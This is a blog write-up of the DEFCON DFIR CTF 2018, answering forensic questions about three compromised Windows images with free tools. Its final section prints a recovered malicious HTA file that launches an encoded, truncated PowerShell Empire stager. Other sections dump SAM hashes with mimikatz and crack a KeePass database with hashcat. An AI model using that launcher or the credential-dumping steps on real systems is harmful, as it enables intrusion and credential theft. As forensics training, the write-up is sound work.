Last August 23, I got stuck at home due to unforeseen circumstances so I decided to try my luck at the DEFCON DFIR CTF 2018 (which was opened to the public last August 14). On this blog post, I will give an in-depth write-up about the tools I used (all of them are free and/or open-source!) and the analysis procedures that I utilized to succeed in solving all the questions on the challenge board.
Primer + Proof of Completion:
NOTE: Since this is a publicly-accessible version of the recently-concluded DEFCON DFIR CTF 2018 by David Cowen, no prizes nor glory is offered upon completion of these challenges by the time it was opened on the 14th of August. In short, I only did this as a self-assessment in order to determine if I learned anything at all during my (approximately) 2 years in the DFIR industry.
Through sheer determination (and lots of coffee and food), I was lucky enough to be the 3rd person to complete all the challenges on August 25th! 🎊
Alright, so enough about me. It’s time to flaunt our DFIR-fu!
Introduction
David Cowen posted this on his blog (be sure to visit www.hecfblog.com as it is a great DFIR resource blog! Unlike mine 😆):
Daily Blog #451: Defcon DFIR CTF 2018 Open to the Public
Hello Reader,
This year at Defcon we made things interesting with a challenge that involves making your way through 3 images to answer questions and solve a case. Now that Defcon is over and the winners awarded it’s your turn to give the challenge a try.
The first image password is ‘tacoproblems’
The second and third image password is gained by answering the right questions in the CTF.
CTF Site:
https://defcon2018.ctfd.io/
Download Links:
Image 1:
https://www.dropbox.com/s/1q4f0fowo8048mq/Image1.7z?dl=0
Image 2:
https://www.dropbox.com/s/9gzjfqkl8uup58k/Image2.7z?dl=0
Image 3:
https://www.dropbox.com/s/jvaqb4rfi3jojbk/Image3.7z?dl=0
Challenge Format
The challenges were divided into 3 main categories, each pertaining to a specific host:
- HR Server (Image 1)
- File Server (Image 2)
- Desktop (Image 3)
Each of these main categories were also divided into 3 sub-categories, summing up to about 9 categories in total:
- HR Server — Basic
- HR Server — Advanced
- HR Server — Expert
- File Server — Basic
- File Server — Advanced
- File Server — Expert
- Desktop — Basic
- Desktop — Advanced
- Desktop — Expert
Clicking on any of the above-listed sub-categories will let you jump to the walkthrough for it.
HR Server (Image 1)
Basic
> HR Server — Acquisition Software (2 points)
Which software was used to image the HR Server?
Since the image is an .e01 file, this question can be answered in several ways. I used ewfinfo for this.
Answer: XWF (X-Ways Forensics)
> HR Server — Acquisition Software Version (2 points)
Which version of the software was used to image the HR Server?
[Format: n.n]
Answer: 19.6
> HR Server — Entry Name (2 points)
What is the file name that represents MFT Entry 168043?
For this question, I used an awesome tool called ANJP.
Answer: pip3.7.exe
> HR Server — Entry Number (2 points)
What is the MFT Entry number of the following file? \xampp\mysql\bin\mysql.exe
Answer: 115322
> HR Server — Attribute ID (2 points)
What is the MFT Attribute ID of the named $J data attribute for the MFT Entry with a file name of $UsnJrnl?
[format is an integer]
For this question, we’ll employ the aid of the bread and butter of both forensics newbies and pros alike (I’m part of the former) — TSK (TheSleuthKit). We’ll use two commands from TSK: mmls and fls
fls lists files and directory names in a disk image. Think of it as running a ls -laR (on steroids) on a disk image. The best part of this command is that you can pipe its output on grep to find specific files.
However, to use fls, you will need to find the offset of the image file. You may do so by using the mmls command.
Based on the output above, you can see that the offset of the partition that we need is on 1026048.
Alright we have our offset, we can now run fls against the image.
There you go, a $DATA (128) attribute with an ID number of 3 (128–3).
Answer: 3
> HR Server — SMB (2 points)
At 2018–08–08 18:10:38.554 (UTC) what was the IP address of the the client that attempted to access SMB via an anonymous logon?
The first (and imo the hardest) step is to know what log to extract from the image. But since the problem specifically asked for SMB, it actually gives us an idea on where to look — SMB Server logs. Now, extract the Microsoft-Windows-SMBServer%4Security.evtx event log from the image itself; the event logs are stored in the C:\Windows\System32\winevt\Logs directory.
For this question, we will use Powershell:
I utilized Powershell’s Get-WinEvent cmdlet to parse the SMBServer Security logs using the following criteria:
- Event ID 551 (SMB Session Authentication Failure)
- Starts at 2018–08–09 02:10:38
- Ends at 2018–08–09 02:10:39
The reason why I used “2018–08–09 02:10:38” is because Windows stores events in UTC but displays it in local time. The country where I live operates on GMT+8, so I added 8 hours to the original time.
The output neatly displayed the details about our target event.
Answer: 80.81.110.50
> HR Server — Saved (2 points)
What was the name of the batch file saved by mpowers?
[answer is fullpath starting with c:*****]
This question requires a bit of looking around. First, let’s look for .bat files in the MFT file list:
We’ll come across a lot of .bat files, but most of them are generated upon installation of certain programs. However, one .bat file stands out: update_app.bat
Answer: C:\Production\update_app.bat
> HR Server — Application Q1 (2 points)
What is the name of the hr management application that hosts a web server?
This one’s pretty easy, application-related questions are usually found in the Program Files directory.
A quick Google search of OrangeHRM suggests that it’s an HR Management System.
Answer: OrangeHRM
> HR Server — Application Q2 (2 points)
What was the public url for the HR system’s portal?
[format: http://*****]
I solved this question by looking at OrangeHRM’s access log located at C:\Program Files\OrangeHRM\4.1\apache\logs\access.log.
In the log file, you can actually see its transition from a localhost url to a public one:
Answer: http://74.118.139.108/orangehrm-4.1/symfony/web/index.php
> HR Server — Changes Q1 (2 points)
What is name of the file that had a change recorded with an update sequence number of 368701440?
This question can be easily answered by the $UsnJrnl:$J file. The update sequence number is usually referred to as the USN number.
Answer: Microsoft-Windows-SMBServer%4Security.evtx
> HR Server — Changes Q1 (2 points)
What is the name of the deleted file with a reference number of 12947848928752043?
This one’s a bit tricky and requires some knowledge about file reference numbers.
An MFT File Reference Number is usually represented as an 8-byte hexadecimal number. The first two bytes represent the Sequence Number, while the 6 remaining bytes represent the MFT Record Number.
Converting 12947848928752043 to hexadecimal gives us 0x2E00000000F1AB (7 bytes). Following the specifications of the MFT File Reference Number, we need to append two 0’s to the start to make it 8 bytes while preserving its original value (i.e. 0x002E00000000F1AB). Afterwards, we need to get the decimal values of the Sequence Number (0x002E == 46) and the MFT File Reference Number (0x00000000F1AB == 61867).
Getting these two values (i.e. 61867 and 46) can help us find the deleted file via its reference number.
Answer: _MEI78882
Advanced
> HR Server — Logon (4 points)
At 2018–07–30 22:31:33 UTC which user was logged in under, what was the logon type (integer), and the logon process name?
[format: {TargetUserName} — {LogonType} — {LogonProcessName} — {IpAddress}]
Instinctively, we need to check the Security event logs — specifically Event ID 4624 — to check for successful logons. Let’s check it out, this should be easy:
Wait. No matches? Let’s try to list all the events then
As you can see, there’s a log with an Event ID of 1102:
Bummer. So where else should we look? Backups? Right, “backups”!
Fortunately for us, there’s a thing called Volume Shadow Snapshots. Let’s try to look if there’s any, by using the command vshadowinfo.
First, mount the .e01 file via ewfmount using the command ewfmount HRServer_Disk0.e01 /mnt/ewf
After doing so, we need to know the device’s volume offset in bytes. We can calculate that by multiplying the offset (i.e. on what sector can we find our target partition? — 1026048) with the sector size (both of them can be known via the mmls command):
So we have 1026048*512 == 525336576 as our device’s volume offset in bytes.
And finally, run vshadowinfo against the image to see if a Volume Shadow Snapshot is available:
Now that we know that a VSS is available, let’s proceed to mount it via the vshadowmount command:
And proceed to actually mount it via the native mount command:
mount -o ro,loop,show_sys_files,input_stream=windows /mnt/vss/vss1 /mnt/shadow (It’s actually just mountwin /mnt/vss/vss1 /mnt/shadow on the SIFT Workstation)
Doing a directory listing of the newly-mounted /mnt/shadow folder shows us the following:
I extracted the Security.evtx file, along with the key registry hives, so I can use them for later. For now, let’s focus at the task at hand.
Like before, let’s try to parse the Security.evtx file using Powershell:
You can immediately see that there are 79 events with the Event ID of 4624.
Parsing the event log via the Powershell command Get-WinEvent -FilterHashtable @{Path=”.\Security_Shadow.evtx”; ID=4624; StartTime=”2018–07–31 06:31:33"; EndTime=”2018–07–31 06:31:34" } | fl | more gives us the following output:
Answer: mpowers-10-User32-74.118.138.195
> HR Server — Task Started (4 points)
At 2018–07–27 02:42:43 (UTC), what is the name of the task that was started?
Again, we’ll use Powershell on the Microsoft-Windows-TaskScheduler%4Operational.evtx event log, filtering for the specified date (don’t forget the time offset vs your local time!) and filtering for the Event ID: 129 (Task Launch)
Answer: \Throw Taco
> HR Server — HR System 1 (4 points)
Which IP address was accessing the OrangeHRM portal via Chrome 68.0.3440.84?
Issuing the command cat access.log|grep -ia “68.0.3440.84” |cut -d” “ -f1 | sort -u gives us the answer.
Answer: 74.118.139.108
> HR Server — Web App (4 points)
What version of Apache was being used
[format: n.n]
The apache_installservice.bat gives us the answer.
Answer: 2.4
> HR Server — Changes Q3 (4 points)
What is the integer representation for the reason code given a USN V2 record where the record’s reason flags have the following:
USN_REASON_CLOSE | USN_REASON_DATA_EXTEND | USN_REASON_FILE_CREATE
This question is just a matter of converting a hexadecimal representation of the reason flags and converting it into decimal. More info here
Based on the docs that I have linked above, we have the following values for each reason flag:
USN_REASON_CLOSE == 0x80000000
USN_REASON_DATA_EXTEND == 0x00000002
USN_REASON_FILE_CREATE == 0x00000100
All the flags combined will give us 0x80000102 , which is equivalent to 2147483906
Answer: 2147483906
Expert
> HR Server — Web Traffic Q1 (8 points)
What was the top communicating IP address with the web server?
This is easy to solve with some command-line kung-fu.
cat access.log | cut -d“ “ -f1 | sort | uniq -c | sort -n | tail -n1
Which results to: 780 74.118.138.195
780 connections from 74.118.138.195
Answer: 74.118.138.195
> HR Server — Web Traffic Q2 (8 points)
How many requests were made to the web server where the requested url contained a wget command within in?
This is also easy to solve. Issuing this command will give us the answer:
cat access.log| grep -a wget | wc -l
Answer: 101
File Server
Basic
> File Server — Basic 1 (2 points)
What is the volume serial number of the only partition on the File Server Disk Image?
Alright, there are also two ways to solve this. One is using good old TSK and the other one is using a forensics suite of your choice. As stated before, I only used free stuff, so I’ll use FTK Imager (for Windows) for the alternate solution.
fsstat displays general details of a file system such as file system type, volume serial number, version, etc.
The volume serial number that was displayed above consists of 8 bytes. However, the volume serial number is typically represented by the last 4 bytes and usually appears with a dash in between the 2nd and 3rd byte. (C096–2465)
The answer as seen from FTK Imager:
Answer: CO96-2465
> File Server — Basic 2 (2 points)
What is the name of the examiner who made the Forensic Image?
We can use ewfinfo and FTK Imager to answer this question.
Answer: Professor Frink
> File Server — Basic 3 (2 points)
Who cleared the security event log?
I was stuck on this question for a long time simply because I was thinking too hard.
When you look at the Security Event Logs for the File Server, you won’t be able to find Security Event ID 1102 (“The audit log was cleared”). The only events that you’ll be able to find are 4625 (Audit Failure) events and some 4624 (Audit Success) events.
Let’s try to list the usernames that generated 4625 events:
Also, let’s list the usernames that generated 4624 events:
From there, I got a hunch that maybe the question isn’t specifically asking for the 1102 (“The audit log was cleared”) event since there is another way to clear the event logs — by generating a lot of logs (in this case, 4625 events) — forcing it to rollover if it reaches a set size (20MB by default).
Since Max Powers (mpowers) was the only normal user account that successfully logged-in, I suspected that the attacker using mpowers ‘ account cleared the event logs.
Answer: Max Powers
> File Server — Basic 4 (2 points)
What is the hostname of the computer?
I already parsed the registry hives using regripper before working on the problems, so this should be fairly easy to answer. The compname plugin that regripper uses on the SYSTEM hive gives us the answer:
Answer: WIN-M5327EF98B9
> File Server — Basic 5 (2 points)
When was the computer last shutdown? UTC Time In the format of Month/Day/Year Hour:Minute:Second in 24 hour timr 1/1/2018 14:01:01
This information is also available on the SYSTEM hive. The shutdown plugin that regripper uses on the SYSTEM hive gives us the answer:
Answer: 7/26/2018 10:16:16
> File Server — Basic 6 (2 points)
What is the Current Build number of Windows on the File Server computer?
This information is available on the SOFTWARE hive. The winnt_cv plugin that regripper uses on the SOFTWARE hive gives us the answer:
Answer: 7601
> File Server — Basic 7 (2 points)
What was mpowers user id?
Account-related information are stored in the SAM hive. The samparse plugin does the work for us:
Answer: 1000
> File Server — Basic 8 (2 points)
Which program did Max Powers last run through the GUI?
User-related information are stored in that specific user’s NTUSER.DAT hive. The UserAssist plugin will display a list of applications that were recently run.
Answer: sub-win-x64_104.148.109.124_5682_3262.exe
> File Server — Basic 9 (2 points)
When did Max Powers last open projections.zip? UTC Time Day/Month/year Hour:Minute:Sec in 24 hour time 1/1/2018 15:20:11
Usually, the recentdocs plugin that regripper performs on a specified user’s NTUSER.DAT hive shows the recent documents that were accessed by the user. However, based on the output below, it seems that these artifacts were wiped.
Let’s try our luck at the NTUSER.DAT from the VSS, then.
Answer: 8/7/2018 20:09:15
> File Server — Basic 10 (2 points)
How many clusters are on the partition?
fsstat also displays the number of clusters via the cluster range:
Clusters from 0–13081342 will give us 13081343 clusters in total.
We can also verify it using FTK Imager (or any other forensic suite):
Answer: 13081343
Advanced
> File Server — Advanced 1 (4 points)
Where does the \VSS directory go?
One way to solve this is by a combination of fls , istat , and icat commands.
Use fls to find the desired file on the MFT:
Using the inode that we just got from the previous command (66634), display the inode details so we can see the Reparse Point attribute that Volume Shadow Copies are known for:
We now know the specific inode for the reparse point. Let’s display its details via icat:
An easier way is to look at the folder using FTK Imager:
Answer: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
> File Server — Advanced 2 (4 points)
When was the Volume Shadow Copy 1 created? Enter answer in UTC TIme in the following format 1/1/2018 13:11:11 Month/Day/Year 24 Hour Time
Also, Volume Shadow Copies can also be seen on the System Volume Information folder on the disk itself.
Answer: 8/7/2018 20:13:26
> File Server — Advanced 3 (4 points)
Where did Max Powers login from?
This one took a lot of querying to actually solve, but I found it on the Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx event log using the Powershell command:
Get-WinEvent -FilterHashtable @{Path=”.\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx”; ID=21} | Where-Object -Property Message -match ‘mpowers’ | fl | moreWhich gives us the following output:
Answer: 74.118.138.195
> File Server — Advanced 4 (4 points)
What program was used to delete forensic artifacts?
Looking at mpowers’ NTUSER.DAT and listing the recently-executed files via the itempos plugin will show several .exe files that seem suspicious. However, one .exe file stands out — PrivaZer.exe. A quick Google-search will reveal that it is an anti-forensics tool.
Answer: PrivaZer.exe
> File Server — Advanced 5 (4 points)
What is the name of the zip file that contains the M4Projects directory?
This one also took up quite some time to find. But finding a lead really relies on the VSS. What I did was to traverse to mpowers’ user folder and usedls -laR | grep zip . This gave me the following output:
However, using unzip -l on the FileServerShare.zip file gave us this:
Which kinda looks similar to the directory structure of the M4Projects directory. Plus, there are no other zip files residing on mpowers’ user folder.
Answer: FileServerShare.zip
> File Server — Advanced 6 (4 points)
What host was used to exfil the data?
I deemed this question as one of the vaguest questions in this CTF when I first read it. I actually had no actual leads but the word exfiltration itself. I also had two questions in mind, is the host the source of the data (so in this case the Fileserver IP?) or the actual destination (unknown at this point)? I tried to pass the Fileserver’s IP (i.e. 74.118.139.11) but it didn’t go through.
So I tried looking for possible destinations of the data. Since there were strong indicators that RDP was used in this incident, I was inclined to check the RDP Bitmap Cache. The RDP Bitmap Cache is relevant when an attacker pivots between systems using the Remote Desktop Services, as it stores some snippets of what the screen looked like when an RDP session was occurring. More info about the RDP Cache can be found here.
The cache folder is located at the %USERPROFILE%\AppData\Local\Microsoft\Terminal Server Client\Cache directory.
After extracting the cache file (bcache22.bmc), I used ANSSI-FR’s RDP Bitmap Cache Parser to extract the bitmaps from the cache files. The resulting output will be displayed below.
Based on the output above, we can see that someone accessed Dropbox via the Chrome browser. (Finally, a lead!)
Let’s try to look around Chrome artifacts. (Located at: %USERPROFILE\AppData\Local\Google\Chrome\User Data\Default)
The most interesting databases here are the Historyand Top Sites databases.
However, the History database doesn’t give us anything of value except the keyword search terms:
Let’s check the Top Sites database:
Hmm. A Dropbox link! Let’s see what it looks like:
We now have an answer!
Answer: www.dropbox.com
> File Server — Advanced 7 (4 points)
What is the url where the data was exfiled to?
We already know the answer based on our investigation for the previous question, but let me show you the benefits of extracting the bitmaps from the RDP Cache.
Now, working with snippets from the RDP Cache is tiring work, but it’s actually manageable. Here is what I have pieced together when I was working on this problem:
Note that this is made up of different bitmaps that were not displayed in this order.
Answer: https://www.dropbox.com/request/51bpm0D7zHjRbfvuqGzt
> File Server — Advanced 8 (4 points)
What registry files did the attacker take? Please list them in alphabetical order with a space in between the names
I got this from the RDP Cache.
Presumably from a certain temp folder. Exfiltrating the SAM and SYSTEM hives is kinda logical since you can use them to crack the passwords stored in the SAM hive.
Answer: SAM SYSTEM
> File Server — Advanced 9 (4 points)
What did the USN Journal get wiped with?
We already identified an anti-forensics tool earlier called PrivaZer.exe. It’s our number 1 suspect for this question, so I tried to download it to see its default configuration parameters. Here are its default settings:
As you can see in its default setting, it scans for traces in the USN Journal — among other things.
Answer: PrivaZer.exe
> File Server — Advanced 10 (4 points)
What service did the attacker use to access this system?
Remember this from File Server — Advanced 3?
Answer: RDP
Expert
> File Server — Expert 1 (8 points)
What program extracted Mnemosyne.sys?
F-Response uses Mnemosyne.sys as the physical driver that is necessary for providing access to physical memory.
Answer: F-Response
> File Server — Expert 2 (8 points)
What directory was wiped?
The answer can be easily seen using ANJP. List the Deletion Events from the USN Journal and the following will be displayed:
Line 733 and up shows the deletion events of the files under C:\M4Projects\project_0x02 directory.
Displaying the contents of the directory via FTK can also support this claim:
Answer: C:\M4Projects\project_0x02
> File Server — Expert 3 (8 points)
Who requested the data to be exfiled?
Remember this screenshot?
Answer: Sideshow Bob
> File Server — Expert 4 (8 points)
What is the email address of the person who uploaded the data to Dropbox?
The only lead I got about this question is the RDP Cache. This are the pictures that I (kinda) arranged:
Answer: snakepleskin@gmail.com
Desktop
Basic
> Desktop — Basic 1 (2 points)
What was the IP address of the Desktop?
This can easily be solved by using regripper:
Answer: 74.118.138.195
> Desktop — Basic 2 (2 points)
What is the SID of the Administrator account?
Also a registry question, this can be easily solved by regrippervia the SAM hive:
On the image below, we can see that the Administrator account has an account ID of 500 (enclosed in square brackets []).
We can now look for the user’s SID:
Answer: S-1–5–21–1769714682–2803786108–491265710–500
> Desktop — Basic 3 (2 points)
What is the timezone offset that the system is in? Example -1
I was also stuck on this question. The answer that I got is different from the answer that was accepted by the game server. Maybe this is due to regex issues, but idk.
To get the timezone information for the machine, I usually run regripper and use the timezone plugin:
As you can see, the TimeZoneKeyname was set to Pacific Standard Time (GMT-8). However, the ActiveTimeBias was set to 420 which suggests that the DaylightSavingTime was used. So my initial answer was -7 but it was not accepted. I also tried -8 to no avail. I then tried to guess a number and ended up with -4 as the answer.
Note: I’m still unsure if it was indeed a misconfiguration. If you have comments/suggestions or if you know why -4 was the answer, please let me know. :D
Answer: -4
> Desktop — Basic 4 (2 points)
What is the name of the deleted volume shadow copy directory in the recycle bin?
First, we need to find the “directory” in the Recycle Bin:
We can see that Administrator’s SID has several deleted directories:
And we can see that the directory $IFATB0K points to C:\vss
Answer: $IFATB0K
> Desktop — Basic 5 (2 points)
What is the name of the directory the attacker copied the files from the VSS to?
Does this screenshot look familiar?
Well, from the previous screenshot:
We can see that $I2JRX90 points to C:\temp and we’re lucky enough that $R2JRX90 still exists:
Answer: C:\temp
> Desktop — Basic 6 (2 points)
What is the name of the file the attacker exfiled?
We can see that the attacker prepared a .7z file to exfiltrate:
Answer: Desktop.7z
> Desktop — Basic 7 (2 points)
What is the ip of the Magnetic Forensics website that the attacker access?
Since the organization that was attacked is Magnetic Forensics, we are looking for indicators of a visit to a website in their network.
Looking at mpowers’ Google Chrome History, we can see that the attacker accessed their HRM:
Answer: 74.118.139.108
> Desktop — Basic 8 (2 points)
What was the administrator’s password?
We can run bkhive and samdump2, however, we will get this as a result:
We get the hash 31d6cfe0d16ae931b73c59d7e0c089c0, which is the known hash of a blank password.
The reason behind this is that the Desktop is running on Windows 10 Enterprise:
Starting the Windows 10 anniversary update, the MD4 hash/es of the password/s in the SAM and/or SYSTEM hives were encrypted using AES128, rendering tools such as bkhive and samdump2 to be outdated.
Luckily, mimikatz is still a thing. Since we already have the SAM and SYSTEM hives, we can use mimikatz’ lsadump::sam module to dump the hashes in the SAM hive:
Since we now have the NTLM hash, we can proceed to crack the password:
Answer: supersecretpassword
Advanced
> Desktop — Advanced 1 (4 points)
How did the attacker access the system?
This question is also tricky that I’m unsure how I pulled it through. Here goes.
First, I tried to analyze mpower’s Google Chrome History since it may be via a malicious download link, a malicious email, etc.
Anyway, the Chrome History file can be found on this path: C:\Users\mpowers\AppData\Local\Google\Chrome\User Data\Default\History
What I found surprised me (sorry for the bait):
If you look closely:
The survey asks for the Partner ID and password.
I answered Desktop--Advanced 2 before answering this question, and the findings that I got on the next question fully supported my hunch that the attacker accessed the system via TeamViewer.
Answer: TeamViewer
> Desktop — Advanced 2 (4 points)
When did the attacker login to the box for the first time? UTC Time Date Format Month/Day/Year 24 Hour Time 1/1/2018 22:00:00
Based on our findings from the previous question, I tried investigating on TeamViewer artifacts. One thing that caught my eye is the file located in C:\Program Files (x86)\TeamViewer\Connections_incoming.txt
It contained an entry that indicates mpowers logged-in via TeamViewer on 07–08–2018 18:40:55 from the hostname DESKTOP-IVOIVRB.
Answer: 8/7/2018 18:40:55
> Desktop — Advanced 3 (4 points)
What account did the attacker login via rdp?
To solve this, we need to take note that Max Powers accessed the phishing link on 8/7/2018 around 18:32:42 . Moreover, the initial login happened at around 18:40:55 .
Therefore, we need to check C:\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx on this specified time range.
Since the country I’m living in uses GMT+8, I used 2018–08–08 3:00:00–4:00:00 as the range for my query.
We can see that there are multiple logins to the Administrator user on the specified time frame.
Answer: Administrator
> Desktop — Advanced 4 (4 points)
When did the account you just identified last have the password changed? UTC Time Format Year-Month-Day 24 Hour Time 2018–01–01 14:01:01
This can be easily seen by running regripperon the SAM hive:
Answer: 8/7/2018 19:31:56
> Desktop — Advanced 5 (4 points)
What gave the attacker access to Max Power’s other accounts?
To check for user slip-ups with regards to passwords, I usually check files on the disk itself. I’m mostly looking for misplaced .txt files or other configuration files. As one way to narrow down my searches, I use the recentdocs plugin of regripper on my target user’s NTUSER.DAT file.
Based on the output above, we can see that there is a keepass database present on the machine. This, when used incorrectly (i.e. using a weak password), may do more harm than good in terms of a user’s security posture.
Answer: KeePass
> Desktop — Advanced 6 (4 points)
What is the name of the file that stored the data you identified in the prior question?
As stated on the previous question, I used the recentdocs plugin to check for recent documents. One cool thing about this plugin is that it lists the recent docs per extension. Look at the image below:
Awesome stuff.
Answer: safeplace.kdbx
> Desktop — Advanced 7 (4 points)
What is the password to the file you identified that allowed the attacker to get access to the other systems?
For this question, I used keepass2john and hashcat.
To get the hash for the KeePass database, use keepass2john. You will end up with this hash:
Be sure to remove the name of the kdbx before cracking away using hashcat. It should look like this:
Results:
Answer: 123456
> Desktop — Advanced 8 (4 points)
What is max powers password on the File Server? This answer is case sensitive
Since we now have access to Max Powers’ KeePass database, we can just inspect the entries within:
Answer: DhhZrwRyEOQwbiJl97a4
> Desktop — Advanced 9 (4 points)
What was the IP address of the acquisition computer?
Opening mpowers’ NTUSER.DAT via regripper, we can see that these files were recently run:
Inspecting the recently-run binary via Radare2’s rabin2 command will yield us this result:
Since we can see that the .exe file is an F-Response-related file, we now have a certain level of confidence of declaring the IP that we found on the filename as the acquisition computer.
Answer: 104.148.109.124
Expert
> Desktop — Malicious Code Hosting (8 points)
What is the IP and port that hosted malicious code that was used in the initial attack?
[format: IP:PORT]
Since the question asks for an entity that hosted malicious code, I decided to look for indicators in mpowers’ Google Chrome History database. Which lead me to this result:
Now let’s inspect the file itself:
$ cat out.hta
<html><head><script>var c= 'powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAFIAcwBJAE8AbgBUAGEAQgBsAEUALgBQAFMAVgBFAFIAcw...JABEAGEAdABhAC4AbABlAG4AZwBUAEgAXQA7AC0AagBPAEkATgBbAEMASABhAHIAWwBdAF0AKAAmACAAJABSACAAJABkAEEAdABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA='
new ActiveXObject('WScript.Shell').Run(c);</script></head><body><script>self.close();</script></body></html>
Base64-encoded powershell commands are bad. Decoding the redacted script above will give us the following output:
This IP Address:Port on the 3rd — 4th to the last lines is the entity that hosted the malicious code.
Answer: 142.93.50.86:80
> Desktop — Expert 2 (8 points)
What was the name of the file executed by the attacker from the ip identified prior?
This question was already answered by our previous analysis.
Answer: out.hta
> Desktop — Expert 3 (8 points)
What is that program actually?
This is also one of those questions that are open to a wide array of interpretations. I tried answering:
- malware
- backdoor
- dropper
- hta
- etc.
— to no avail. That’s when I realized that maybe out.hta was just renamed but belonged to a known exploit family.
After hours of searching, I came across this blog post, which contained this image:
Which looks similar to this, just in hta format:
The blog post talked about a Powershell Post-Exploitation Framework called Powershell Empire. This particular command that was generated by Powershell Empire setups a launcher that communicates with a listener.
Answer: Powershell Empire
Final Thoughts
This CTF, aside from being fun and challenging, closely imitates real-world scenarios — this makes it a great learning resource. I hope more investigation-related CTFs will come forth soon, and I hope this write-up sparked your interest for the digital forensics field!
I hope you learned a thing or two. As always, thank you for reading! ❤️
